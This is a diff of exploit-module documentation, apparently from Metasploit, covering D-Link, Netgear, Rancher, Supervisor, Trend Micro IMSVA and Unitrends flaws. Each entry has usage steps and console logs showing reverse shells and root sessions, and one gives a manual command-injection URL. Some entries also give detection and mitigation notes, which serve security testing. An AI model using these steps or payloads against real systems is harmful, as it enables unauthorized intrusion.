||||||
|
|
||||||
|
1. Start msfconsole
|
||||||
|
2. Do : `use exploit/linux/http/dlink_dir850l_unauth_exec.rb`
|
||||||
|
3. Do : `set RHOST [RouterIP]`
|
||||||
|
4. Do : `set PAYLOAD linux/mipsbe/shell/reverse_tcp`
|
||||||
|
5. Do : `run`
|
||||||
|
6. If router is vulnerable, payload should be dropped via wget and executed, and therein should obtain an session
|
||||||
|
|
||||||
|
|
||||||
|
## Example
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use exploit/linux/http/dlink_dir850l_unauth_exec
|
||||||
|
msf exploit(dlink_dir850l_unauth_exec) > set RHOST 192.168.0.14
|
||||||
|
RHOST => 192.168.0.14
|
||||||
|
msf exploit(dlink_dir850l_unauth_exec) > set RPORT 80
|
||||||
|
RPORT => 80
|
||||||
|
msf exploit(dlink_dir850l_unauth_exec) > check
|
||||||
|
[*] 192.168.0.14:80 The target service is running, but could not be validated.
|
||||||
|
msf exploit(dlink_dir850l_unauth_exec) > set VERBOSE true
|
||||||
|
VERBOSE => true
|
||||||
|
msf exploit(dlink_dir850l_unauth_exec) > set LHOST ens3
|
||||||
|
LHOST => ens3
|
||||||
|
msf exploit(dlink_dir850l_unauth_exec) > set LPORT 3131
|
||||||
|
LPORT => 3131
|
||||||
|
msf exploit(dlink_dir850l_unauth_exec) > run
|
||||||
|
|
||||||
|
[*] Started reverse TCP handler on 192.168.0.11:3131
|
||||||
|
[*] 192.168.0.14:80 - Connecting to target...
|
||||||
|
[+] 192.168.0.14:80 - Retrieved the username/password combo Admin/92830535
|
||||||
|
[+] 192.168.0.14:80 - Downloaded credentials to /root/.msf4/loot/20171104113614_default_192.168.0.14_dlink.dir850l.lo_146186.txt
|
||||||
|
[*] 192.168.0.14:80 - Starting up web service http://192.168.0.11:8080/ZUrlVeWUm
|
||||||
|
[*] Using URL: http://0.0.0.0:8080/ZUrlVeWUm
|
||||||
|
[*] Local IP: http://192.168.0.11:8080/ZUrlVeWUm
|
||||||
|
[*] 192.168.0.14:80 - Asking target to request to download http://192.168.0.11:8080/ZUrlVeWUm
|
||||||
|
[*] 192.168.0.14:80 - Waiting for target to request the ELF payload...
|
||||||
|
[*] 192.168.0.14:80 - Sending payload to the server...
|
||||||
|
[*] 192.168.0.14:80 - Requesting device to chmod ZUrlVeWUm
|
||||||
|
[*] 192.168.0.14:80 - Requesting device to execute ZUrlVeWUm
|
||||||
|
[*] 192.168.0.14:80 - Waiting 10 seconds for shell to connect back to us...
|
||||||
|
[*] Sending stage (84 bytes) to 192.168.0.14
|
||||||
|
[*] Command shell session 1 opened (192.168.0.11:3131 -> 192.168.0.14:43953) at 2017-11-04 11:36:26 -0400
|
||||||
|
[+] Deleted /tmp/uoskutcy
|
||||||
|
[-] Exploit aborted due to failure: unknown: 192.168.0.14:80 - Shell never connected to us!, disconnect?
|
||||||
|
[*] Server stopped.
|
||||||
|
[*] Exploit completed, but no session was created.
|
||||||
|
msf exploit(dlink_dir850l_unauth_exec) > sessions -i 1
|
||||||
|
[*] Starting interaction with 1...
|
||||||
|
|
||||||
|
190745749
|
||||||
|
wUVNdEKSrgeaxdSQyfTyxvaoYgFzyvGj
|
||||||
|
true
|
||||||
|
pQfaUhhwMvgnWrLpQXhhUAioNBFHPRZP
|
||||||
|
OgkEaOTPYbUEOLlLpLFEbodBvHFmVRmH
|
||||||
|
iNaYBrmsZqFyolPWWRKEHsKglrSlSGkY
|
||||||
|
pwd
|
||||||
|
/
|
||||||
|
```
|
|
@ -0,0 +1,51 @@
|
||||||
|
The module netgear_dgn1000_setup_unauth_exec exploits an unauthenticated OS command injection vulnerability in vulnerable Netgear DGN1000 with firmware versions up to `1.1.00.48` in addition to DGN2000v1 models, all firmware versions. The vulnerability occurs in within the `syscmd` fuction of the `setup.cgi` script to execute arbitrary commands. Manual exploitation could be completed through the browser, as for example : `http://<RouterIP>/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=echo+vulnerable&curpath=/¤tsetting.htm=1`. Such example will return "vulnerable" on the page. Vulnerable models have `wget` installed on `/usr/bin/wget` and can be leveraged to drop a MIPS Big Endian payload.
|
||||||
|
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
Netgear DGN1000 with firmware versions up to `1.1.00.48` and DGN2000v1 models
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Start msfconsole
|
||||||
|
2. Do : `use exploit/linux/http/netgear_dgn1000_setup_unauth_exec`
|
||||||
|
3. Do : `set RHOST [RouterIP]`
|
||||||
|
4. Do : `set PAYLOAD [payload]`
|
||||||
|
5. Do : `run`
|
||||||
|
6. If router is vulnerable, payload should be dropped via wget and executed, and therein should obtain an session
|
||||||
|
|
||||||
|
## Scenarious
|
||||||
|
|
||||||
|
Sample output of a successfull exploitation should be look like this :
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use exploit/linux/http/netgear_dgn1000_setup_unauth_exec
|
||||||
|
msf exploit(netgear_dgn1000_setup_unauth_exec) > set RHOST 192.168.0.1
|
||||||
|
RHOST => 192.168.0.1
|
||||||
|
msf exploit(netgear_dgn1000_setup_unauth_exec) > set RPORT 80
|
||||||
|
RPORT => 80
|
||||||
|
msf exploit(netgear_dgn1000_setup_unauth_exec) > set LHOST eth0
|
||||||
|
LHOST = eth0
|
||||||
|
msf exploit(netgear_dgn1000_setup_unauth_exec) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp
|
||||||
|
PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp
|
||||||
|
msf exploit(netgear_dgn1000_setup_unauth_exec) > run
|
||||||
|
|
||||||
|
[*] Started reverse TCP handler on 192.168.0.11:4444
|
||||||
|
[*] 192.168.0.1:80 - Connecting to target...
|
||||||
|
[*] 192.168.0.1:80 - Exploiting target ....
|
||||||
|
[*] Using URL: http://0.0.0.0:8080/DnuJhOHYg7auIz
|
||||||
|
[*] Local IP: http://192.168.0.11:8080/DnuJhOHYg7auIz
|
||||||
|
[*] Client 192.168.0.1 (Wget) requested /DnuJhOHYg7auIz
|
||||||
|
[*] Sending payload to 192.168.0.1 (Wget)
|
||||||
|
[*] Sending stage (1073332 bytes) to 192.168.0.1
|
||||||
|
[*] Meterpreter session 2 opened (192.168.0.11:4444 -> 192.168.0.1:51558) at 2017-10-20 20:37:06 -0400
|
||||||
|
[*] Command Stager progress - 100.00% done (129/129 bytes)
|
||||||
|
[*] Server stopped.
|
||||||
|
|
||||||
|
meterpreter > sysinfo
|
||||||
|
Computer : 192.168.0.1
|
||||||
|
OS : (Linux 2.6.20-Amazon_SE)
|
||||||
|
Architecture : mips
|
||||||
|
Meterpreter : mipsbe/linux
|
||||||
|
meterpreter >
|
||||||
|
```
|
||||||
|
|
|
@ -0,0 +1,169 @@
|
||||||
|
# Vulnerable Application
|
||||||
|
Utilizing Rancher Server, an attacker can create a docker container
|
||||||
|
with the '/' path mounted with read/write permissions on the host
|
||||||
|
server that is running the docker container. As the docker container
|
||||||
|
executes command as uid 0 it is honored by the host operating system
|
||||||
|
allowing the attacker to edit/create files owned by root. This exploit
|
||||||
|
abuses this to creates a cron job in the '/etc/cron.d/' path of the
|
||||||
|
host server.
|
||||||
|
|
||||||
|
The Docker image should exist on the target system or be a valid image
|
||||||
|
from hub.docker.com.
|
||||||
|
|
||||||
|
Use `check` with verbose mode to get a list of exploitable Rancher
|
||||||
|
Hosts managed by the target system.
|
||||||
|
|
||||||
|
## Rancher setup
|
||||||
|
Rancher is deployed as a set of Docker containers. Running Rancher is
|
||||||
|
as simple as launching two containers. One container as the management
|
||||||
|
server and another container on a node as an agent.
|
||||||
|
|
||||||
|
This module was tested with Debian 9 and CentOS 7 as the host operating
|
||||||
|
system with Docker 17.06.1-ce and Rancher Server 1.6.2, all with
|
||||||
|
default installation.
|
||||||
|
|
||||||
|
### Install Debian 9
|
||||||
|
First [install Debian 9][1] with default task selection. This includes
|
||||||
|
the "*standard system utilities*".
|
||||||
|
|
||||||
|
### Install Docker CE
|
||||||
|
Then install a supported version of [Docker on Debian system][2].
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# TL;DR
|
||||||
|
apt-get remove docker docker-engine
|
||||||
|
apt-get install apt-transport-https ca-certificates curl gnupg2 software-properties-common
|
||||||
|
curl -fsSL https://download.docker.com/linux/debian/gpg | apt-key add -
|
||||||
|
apt-key fingerprint 0EBFCD88
|
||||||
|
# Verify that the key ID is 9DC8 5822 9FC7 DD38 854A E2D8 8D81 803C 0EBF CD88.
|
||||||
|
add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/debian $(lsb_release -cs) stable"
|
||||||
|
apt-get update
|
||||||
|
apt-get install docker-ce
|
||||||
|
docker run hello-world
|
||||||
|
```
|
||||||
|
|
||||||
|
### Rancher Server (Management)
|
||||||
|
I recommend doing a ['Rancher Server - Single Container (NON-HA)'
|
||||||
|
installation][3].
|
||||||
|
|
||||||
|
If Docker is installed, the command to start a single instance of
|
||||||
|
Rancher is simple.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# TL;DR
|
||||||
|
sudo docker run -d --restart=unless-stopped -p 8080:8080 rancher/server
|
||||||
|
```
|
||||||
|
|
||||||
|
If all is passing navigate to `http://[ip]:8080/`. You should see the
|
||||||
|
Rancher Server UI web application.
|
||||||
|
|
||||||
|
### Rancher Host (Agent)
|
||||||
|
|
||||||
|
Add a [new host][4] to Rancher Server so that the Docker host can be managed.
|
||||||
|
|
||||||
|
**Set Host Registration URL**
|
||||||
|
|
||||||
|
The first time that you add a host, you may be required to set up the
|
||||||
|
Host Registration URL.
|
||||||
|
|
||||||
|
* Navigate to Admin / Settings (`http://[ip]:8080/admin/settings`)
|
||||||
|
* Check if `"http://[ip]:8080/"` is set
|
||||||
|
* Click on Save.
|
||||||
|
|
||||||
|
**Add new host**
|
||||||
|
|
||||||
|
* Navigate to Infrastructure / Hosts (`http://[ip]:8080/env/1a5/infra/hosts`)
|
||||||
|
* Click on Add Host
|
||||||
|
* Copy the command from Point 5 (and remove sudo prefix)
|
||||||
|
`docker run --rm --privileged -v /var/run/docker.sock:/var/run/docker.sock -v /var/lib/rancher:/var/lib/rancher rancher/agent:v1.2.2 http://[ip]:8080/v1/scripts/XXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXX`
|
||||||
|
* Paste and run the command on the host
|
||||||
|
|
||||||
|
The new host should pop up on the Hosts screen within a minute.
|
||||||
|
|
||||||
|
# Exploitation
|
||||||
|
This module is designed to gain root access on a Rancher Host.
|
||||||
|
|
||||||
|
## Options
|
||||||
|
- CONTAINER_ID if you want to have a human readable name for your container, otherwise it will be randomly generated.
|
||||||
|
- DOCKERIMAGE is the local image or hub.docker.com available image you want to have Rancher to deploy for this exploit.
|
||||||
|
- TARGETENV this is the target Rancher Environment. The default environment is `1a5`.
|
||||||
|
- TARGETHOST is the target Rancher Host. The default host is `1h1`.
|
||||||
|
|
||||||
|
By default access control is disabled, but if enabled, you need API
|
||||||
|
Keys with at least "restrictive" permission in the environment.
|
||||||
|
See Rancher docs for [api-keys][5] and [membership-roles][6].
|
||||||
|
|
||||||
|
- HttpUsername is for your Access Key
|
||||||
|
- HttpPassword is for your Secret Key
|
||||||
|
|
||||||
|
Advanced Options
|
||||||
|
- TARGETURI this is the Rancher API base path. The default environment is `/v1/projects`.
|
||||||
|
- WAIT_TIMEOUT is how long you will wait for a docker container to deploy before bailing out if it does not start.
|
||||||
|
|
||||||
|
## Steps to exploit with module
|
||||||
|
- [ ] Start msfconsole
|
||||||
|
- [ ] use exploit/linux/http/rancher_server
|
||||||
|
- [ ] Set the options appropriately and set VERBOSE to true
|
||||||
|
- [ ] Verify it creates a docker container and it successfully runs
|
||||||
|
- [ ] After a minute a session should be opened from the agent server
|
||||||
|
|
||||||
|
## Example Output
|
||||||
|
```
|
||||||
|
msf > use exploit/linux/http/rancher_server
|
||||||
|
msf exploit(rancher_server) > set RHOST 192.168.91.111
|
||||||
|
RHOST => 192.168.91.111
|
||||||
|
msf exploit(rancher_server) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
|
||||||
|
PAYLOAD => linux/x64/meterpreter/reverse_tcp
|
||||||
|
msf exploit(rancher_server) > set LHOST 192.168.91.1
|
||||||
|
LHOST => 192.168.91.1
|
||||||
|
msf exploit(rancher_server) > set VERBOSE true
|
||||||
|
VERBOSE => true
|
||||||
|
msf exploit(rancher_server) > check
|
||||||
|
|
||||||
|
[+] Rancher Host "rancher" (TARGETHOST 1h1) on Environment "Default" (TARGETENV 1a5) found <-- targeted
|
||||||
|
[*] 192.168.91.111:8080 The target is vulnerable.
|
||||||
|
msf exploit(rancher_server) > exploit
|
||||||
|
|
||||||
|
[*] Started reverse TCP handler on 192.168.91.1:4444
|
||||||
|
[*] Setting container json request variables
|
||||||
|
[*] Creating the docker container command
|
||||||
|
[+] The docker container is created, waiting for it to deploy
|
||||||
|
[*] Waiting up to 60 seconds for docker container to start
|
||||||
|
[+] The docker container has stopped, now trying to remove it
|
||||||
|
[+] The docker container has been removed.
|
||||||
|
[*] Waiting for the cron job to run, can take up to 60 seconds
|
||||||
|
[*] Sending stage (40747 bytes) to 192.168.91.111
|
||||||
|
[*] Meterpreter session 1 opened (192.168.91.1:4444 -> 192.168.91.111:49948) at 2017-07-27 22:18:00 +0200
|
||||||
|
[+] Deleted /etc/cron.d/wlHVKGMA
|
||||||
|
[+] Deleted /tmp/jxKUxUyN
|
||||||
|
|
||||||
|
meterpreter > sysinfo
|
||||||
|
Computer : rancher
|
||||||
|
OS : Debian 9.1 (Linux 4.9.0-3-amd64)
|
||||||
|
Architecture : x64
|
||||||
|
Meterpreter : x64/linux
|
||||||
|
meterpreter >
|
||||||
|
```
|
||||||
|
## Exploit Detection
|
||||||
|
Rancher Server has an [audit log][7]. While running this module two
|
||||||
|
events (create and delete) were logged. Even though the container is
|
||||||
|
deleted, its still able to be viewed from the link in the audit log.
|
||||||
|
|
||||||
|
## Mitigation
|
||||||
|
* Do not deploy a Rancher Host on the same host where the Rancher
|
||||||
|
Server is. Your entire rancher infrastructure is in [danger][8].
|
||||||
|
* Only allow trusted users to have more permissions than read-only.
|
||||||
|
|
||||||
|
Docker protection such as Username Namespaces could not be applied
|
||||||
|
because Rancher Agents run as a privileged container.
|
||||||
|
|
||||||
|
|
||||||
|
[1]:https://www.debian.org/releases/stretch/amd64/index.html.en
|
||||||
|
[2]:https://docs.docker.com/engine/installation/linux/docker-ce/debian/
|
||||||
|
[3]:https://rancher.com/docs/rancher/v1.6/en/installing-rancher/installing-server/#launching-rancher-server---single-container-non-ha
|
||||||
|
[4]:https://rancher.com/docs/rancher/v1.6/en/hosts/#adding-a-host
|
||||||
|
[5]:https://rancher.com/docs/rancher/v1.6/en/api/v2-beta/api-keys/
|
||||||
|
[6]:https://rancher.com/docs/rancher/v1.6/en/environments/#membership-roles
|
||||||
|
[7]:https://rancher.com/docs/rancher/v1.6/en/rancher-services/audit-log/
|
||||||
|
[8]:https://rancher.com/docs/rancher/v1.6/en/faqs/troubleshooting/#help-i-turned-on-access-controldocsrancherv16enconfigurationaccess-control-and-can-no-longer-access-rancher-how-do-i-reset-rancher-to-disable-access-control
|
||||||
|
[9]:https://rancher.com/docs/rancher/v1.6/en/installing-rancher/selinux/
|
|
@ -0,0 +1,78 @@
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
This module exploits an authenticated RCE vulnerability in Supervisor versions 3.0a1 to 3.3.2
|
||||||
|
|
||||||
|
This has been tested with versions 3.2.0 and 3.3.2
|
||||||
|
|
||||||
|
### Creating A Testing Environment
|
||||||
|
|
||||||
|
At the time of writing, version 3.2.0-2ubuntu0.1 is available in the Ubuntu repositories.
|
||||||
|
|
||||||
|
1. ```sudo apt-get install supervisor```
|
||||||
|
2. Enable Web interface/XML-RPC server in Supervisor config in `/etc/supervisor/supervisord.conf`
|
||||||
|
|
||||||
|
```
|
||||||
|
[inet_http_server] ; inet (TCP) server disabled by default
|
||||||
|
port=:9001 ; ip_address:port specifier, *:port for all iface
|
||||||
|
username=user ; default is no username (open server)
|
||||||
|
password=123 ; default is no password (open server)
|
||||||
|
```
|
||||||
|
|
||||||
|
3. Restart the service: `sudo service supervisor restart`
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. ```use exploit/linux/http/supervisor_xmlrpc_exec```
|
||||||
|
2. ```set lhost [IP]```
|
||||||
|
3. ```set rhost [IP]```
|
||||||
|
4. ```set httpusername user```
|
||||||
|
5. ```set httppassword 123```
|
||||||
|
6. ```exploit```
|
||||||
|
7. A meterpreter session should have been opened successfully
|
||||||
|
|
||||||
|
## Options
|
||||||
|
|
||||||
|
**HttpUsername**
|
||||||
|
|
||||||
|
Username for HTTP basic auth which is set in the conf file(optional)
|
||||||
|
|
||||||
|
**HttpPassword**
|
||||||
|
|
||||||
|
Password for HTTP basic auth which is set in the conf file(optional)
|
||||||
|
|
||||||
|
**TARGETURI**
|
||||||
|
|
||||||
|
The path to the XML-RPC endpoint
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
### Supervisor 3.2.0 on Xubuntu 16.04
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use exploit/linux/http/supervisor_xmlrpc_exec
|
||||||
|
msf exploit(supervisor_xmlrpc_exec) > set httpusername user
|
||||||
|
httpusername => user
|
||||||
|
msf exploit(supervisor_xmlrpc_exec) > set httppassword 123
|
||||||
|
httppassword => 123
|
||||||
|
msf exploit(supervisor_xmlrpc_exec) > set lhost 192.168.0.2
|
||||||
|
lhost => 192.168.0.2
|
||||||
|
msf exploit(supervisor_xmlrpc_exec) > set rhost 192.168.0.19
|
||||||
|
rhost => 192.168.0.19
|
||||||
|
msf exploit(supervisor_xmlrpc_exec) > check
|
||||||
|
|
||||||
|
[*] Extracting version from web interface..
|
||||||
|
[*] Using basic auth (user:123)
|
||||||
|
[+] Vulnerable version found: 3.2.0
|
||||||
|
[*] 192.168.0.19:9001 The target appears to be vulnerable.
|
||||||
|
msf exploit(supervisor_xmlrpc_exec) > exploit
|
||||||
|
|
||||||
|
[*] Started reverse TCP handler on 192.168.0.2:4444
|
||||||
|
[*] Sending XML-RPC payload via POST to 192.168.0.19:9001/RPC2
|
||||||
|
[*] Using basic auth (user:123)
|
||||||
|
[*] Sending stage (2878872 bytes) to 192.168.0.19
|
||||||
|
[*] Command Stager progress - 100.00% done (782/782 bytes)
|
||||||
|
[+] Request timeout, usually indicates success. Passing to handler..
|
||||||
|
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.19:36186) at 2017-08-30 01:24:45 +0100
|
||||||
|
|
||||||
|
meterpreter >
|
||||||
|
```
|
|
@ -0,0 +1,61 @@
|
||||||
|
## Vulnerable Application
|
||||||
|
This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a terminal command under the context of the web server user.
|
||||||
|
|
||||||
|
The specific flaw exists within the management interface, which listens on TCP port 443 by default. Trend Micro IMSVA product have widget feature which is implemented with PHP. Insecurely configured web server exposes diagnostic.log file, which leads to an extraction of JSESSIONID value from administrator session. Proxy.php files under the mod TMCSS folder takes multiple parameter but the process does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the web server user.
|
||||||
|
|
||||||
|
**Vulnerable Application Installation Steps**
|
||||||
|
|
||||||
|
IMSVA is distrubed as an ISO image by Trend Micro.
|
||||||
|
|
||||||
|
Following steps are valid on the CentOS 6 x64 bit operating system.
|
||||||
|
|
||||||
|
1. Open following URL [http://downloadcenter.trendmicro.com/](http://downloadcenter.trendmicro.com/)
|
||||||
|
2. Find "InterScan Messaging Security (Virtual Appliance)" and click.
|
||||||
|
3. At the time of writing this documentation, you must see "IMSVA-9.1-1600-x86-64-r2.iso" next to Download button.
|
||||||
|
4. Click to the download button and complete installation of ISO.
|
||||||
|
|
||||||
|
If you don't see a affected version of IMSVA, you can try to download IMSVA-9.1-1600 directly from following URL.
|
||||||
|
|
||||||
|
[http://files.trendmicro.com/products/imsva/9.1/IMSVA-9.1-1600-x86_64-r2.iso](http://files.trendmicro.com/products/imsva/9.1/IMSVA-9.1-1600-x86_64-r2.iso)
|
||||||
|
|
||||||
|
**System requirements:**
|
||||||
|
- Virtualbox or VMware can be used.
|
||||||
|
- 4 GB of memory at least.
|
||||||
|
- 120 GB of disk size at least.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
A successful check of the exploit will look like this:
|
||||||
|
|
||||||
|
- [ ] Start `msfconsole`
|
||||||
|
- [ ] `use exploit/linux/http/trendmicro_imsva_widget_exec`
|
||||||
|
- [ ] Set `RHOST`
|
||||||
|
- [ ] Set `LHOST`
|
||||||
|
- [ ] Run `check`
|
||||||
|
- [ ] **Verify** that you are seeing `The target appears to be vulnerable.`
|
||||||
|
- [ ] Run `exploit`
|
||||||
|
- [ ] **Verify** that you are seeing `Awesome. JSESSIONID value` in console.
|
||||||
|
- [ ] **Verify** that you are getting `Session with widget framework successfully initiated` session.
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use exploit/linux/http/trendmicro_imsva_widget_exec
|
||||||
|
msf exploit(trendmicro_imsva_widget_exec) > set RHOST 12.0.0.201
|
||||||
|
RHOST => 12.0.0.184
|
||||||
|
msf exploit(trendmicro_imsva_widget_exec) > check
|
||||||
|
[*] 12.0.0.184:443 The target appears to be vulnerable.
|
||||||
|
msf exploit(trendmicro_imsva_widget_exec) > exploit
|
||||||
|
|
||||||
|
[*] Started reverse TCP handler on 12.0.0.1:4444
|
||||||
|
[*] Extracting JSESSIONID from publicly accessible log file
|
||||||
|
[+] Awesome. JSESSIONID value = 0567E974AE729E58178C9B513FEBE41E
|
||||||
|
[*] Initiating session with widget framework
|
||||||
|
[+] Session with widget framework successfully initiated.
|
||||||
|
[*] Trigerring command injection vulnerability
|
||||||
|
[*] Command shell session 1 opened (12.0.0.1:4444 -> 12.0.0.201:44103) at 2017-10-08 18:05:11 +0300
|
||||||
|
|
||||||
|
pwd
|
||||||
|
/opt/trend/imss/UI/adminUI/ROOT/widget
|
||||||
|
|
||||||
|
```
|
|
@ -0,0 +1,42 @@
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
Unitrends UEB 9 http api/storage remote root
|
||||||
|
|
||||||
|
This exploit leverages a sqli vulnerability for authentication bypass,
|
||||||
|
together with command injection for subsequent root RCE.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. ```use exploit/linux/http/ueb9_api_storage ```
|
||||||
|
2. ```set lhost [IP]```
|
||||||
|
3. ```set rhost [IP]```
|
||||||
|
4. ```exploit```
|
||||||
|
5. A meterpreter session should have been opened successfully
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
### UEB 9.1 on CentOS 6.5
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use exploit/linux/http/ueb9_api_storage
|
||||||
|
msf exploit(ueb9_api_storage) > set rhost 10.0.0.230
|
||||||
|
rhost => 10.0.0.230
|
||||||
|
msf exploit(ueb9_api_storage) > set lhost 10.0.0.141
|
||||||
|
lhost => 10.0.0.141
|
||||||
|
msf exploit(ueb9_api_storage) > exploit
|
||||||
|
|
||||||
|
[*] Started reverse TCP handler on 10.0.0.141:4444
|
||||||
|
[*] 10.0.0.230:443 - pwn'ng ueb 9....
|
||||||
|
[*] Command Stager progress - 19.83% done (164/827 bytes)
|
||||||
|
[*] Command Stager progress - 39.30% done (325/827 bytes)
|
||||||
|
[*] Command Stager progress - 57.44% done (475/827 bytes)
|
||||||
|
[*] Command Stager progress - 75.45% done (624/827 bytes)
|
||||||
|
[*] Command Stager progress - 93.35% done (772/827 bytes)
|
||||||
|
[*] Command Stager progress - 110.88% done (917/827 bytes)
|
||||||
|
[*] Sending stage (826872 bytes) to 10.0.0.230
|
||||||
|
[*] Command Stager progress - 126.72% done (1048/827 bytes)
|
||||||
|
[*] Meterpreter session 1 opened (10.0.0.141:4444 -> 10.0.0.230:33674) at 2017-10-06 11:07:47 -0400
|
||||||
|
|
||||||
|
meterpreter > getuid
|
||||||
|
Server username: uid=0, gid=0, euid=0, egid=0
|
||||||
|
```
|
|
@ -0,0 +1,72 @@
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
Unitrends UEB 9 bpserverd authentication bypass RCE
|
||||||
|
|
||||||
|
This exploit uses roughly the same process to gain root execution
|
||||||
|
as does the apache user on the Unitrends appliance. The process is
|
||||||
|
something like this:
|
||||||
|
|
||||||
|
1. Connect to xinetd process (it's usually running on port 1743)
|
||||||
|
2. This process will send something like: `?A,Connect36092`
|
||||||
|
3. Initiate a second connection to the port specified
|
||||||
|
in the packet from xinetd (36092 in this example)
|
||||||
|
4. send a specially crafted packet to xinetd, containing the
|
||||||
|
command to be executed as root
|
||||||
|
5. Receive command output from the connection to port 36092
|
||||||
|
6. Close both connections
|
||||||
|
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. ```use exploit/linux/misc/ueb9_bpserverd ```
|
||||||
|
2. ```set lhost [IP]```
|
||||||
|
3. ```set rhost [IP]```
|
||||||
|
4. ```exploit```
|
||||||
|
5. A meterpreter session should have been opened successfully
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
### UEB 9.1 on CentOS 6.5
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use exploit/linux/misc/ueb9_bpserverd
|
||||||
|
msf exploit(ueb9_bpserverd) > set rhost 10.0.0.230
|
||||||
|
rhost => 10.0.0.230
|
||||||
|
msf exploit(ueb9_bpserverd) > set lhost 10.0.0.141
|
||||||
|
lhost => 10.0.0.141
|
||||||
|
msf exploit(ueb9_bpserverd) > exploit
|
||||||
|
|
||||||
|
[*] Started reverse TCP handler on 10.0.0.141:4444
|
||||||
|
[*] 10.0.0.230:1743 - 10.0.0.230:1743 - pwn'ng ueb 9....
|
||||||
|
[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
|
||||||
|
[+] 10.0.0.230:1743 - bpd port recieved: 45425
|
||||||
|
[*] 10.0.0.230:1743 - Connecting to 45425
|
||||||
|
[+] 10.0.0.230:1743 - Connected!
|
||||||
|
[*] 10.0.0.230:1743 - Sending command buffer to xinetd
|
||||||
|
[*] 10.0.0.230:1743 - Command Stager progress - 26.71% done (199/745 bytes)
|
||||||
|
[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
|
||||||
|
[+] 10.0.0.230:1743 - bpd port recieved: 40889
|
||||||
|
[*] 10.0.0.230:1743 - Connecting to 40889
|
||||||
|
[+] 10.0.0.230:1743 - Connected!
|
||||||
|
[*] 10.0.0.230:1743 - Sending command buffer to xinetd
|
||||||
|
[*] 10.0.0.230:1743 - Command Stager progress - 53.56% done (399/745 bytes)
|
||||||
|
[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
|
||||||
|
[+] 10.0.0.230:1743 - bpd port recieved: 40016
|
||||||
|
[*] 10.0.0.230:1743 - Connecting to 40016
|
||||||
|
[+] 10.0.0.230:1743 - Connected!
|
||||||
|
[*] 10.0.0.230:1743 - Sending command buffer to xinetd
|
||||||
|
[*] 10.0.0.230:1743 - Command Stager progress - 80.27% done (598/745 bytes)
|
||||||
|
[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
|
||||||
|
[+] 10.0.0.230:1743 - bpd port recieved: 53649
|
||||||
|
[*] 10.0.0.230:1743 - Connecting to 53649
|
||||||
|
[+] 10.0.0.230:1743 - Connected!
|
||||||
|
[*] 10.0.0.230:1743 - Sending command buffer to xinetd
|
||||||
|
[*] Sending stage (826872 bytes) to 10.0.0.230
|
||||||
|
[*] Meterpreter session 1 opened (10.0.0.141:4444 -> 10.0.0.230:33715) at 2017-10-06 11:33:56 -0400
|
||||||
|
[*] 10.0.0.230:1743 - Command Stager progress - 100.00% done (745/745 bytes)
|
||||||
|
|
||||||
|
meterpreter > getuid
|
||||||
|
Server username: uid=0, gid=0, euid=0, egid=0
|
||||||
|
meterpreter >
|
||||||
|
|
||||||
|
```
|
|
@ -21,6 +21,7 @@ Compatible Payloads
|
||||||
Name Disclosure Date Rank Description
|
Name Disclosure Date Rank Description
|
||||||
---- --------------- ---- -----------
|
---- --------------- ---- -----------
|
||||||
cmd/mainframe/apf_privesc_jcl normal JCL to escalate privilages via APF LIB
|
cmd/mainframe/apf_privesc_jcl normal JCL to escalate privilages via APF LIB
|
||||||
|
cmd/mainframe/bind_shell_jcl normal Z/OS (MVS) Command Shell, Bind TCP
|
||||||
cmd/mainframe/generic_jcl normal Generic JCL Test for Mainframe Exploits
|
cmd/mainframe/generic_jcl normal Generic JCL Test for Mainframe Exploits
|
||||||
cmd/mainframe/reverse_shell_jcl normal Z/OS (MVS) Command Shell, Reverse TCP
|
cmd/mainframe/reverse_shell_jcl normal Z/OS (MVS) Command Shell, Reverse TCP
|
||||||
```
|
```
|
||||||
|
|
|
@ -0,0 +1,251 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This module exploits a vulnerability found in Mako Server v2.5, 2.6.
|
||||||
|
It's possible to inject arbitrary OS commands in the Mako Server tutorial page through a PUT request to save.lsp. Attacker input will be saved on the victims machine and can be executed by sending a GET request to manage.lsp.
|
||||||
|
|
||||||
|
Based on the public PoC found here: https://blogs.securiteam.com/index.php/archives/3391
|
||||||
|
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
[Mako Server](https://makoserver.net) is an application framework for designing web and IoT applications.
|
||||||
|
|
||||||
|
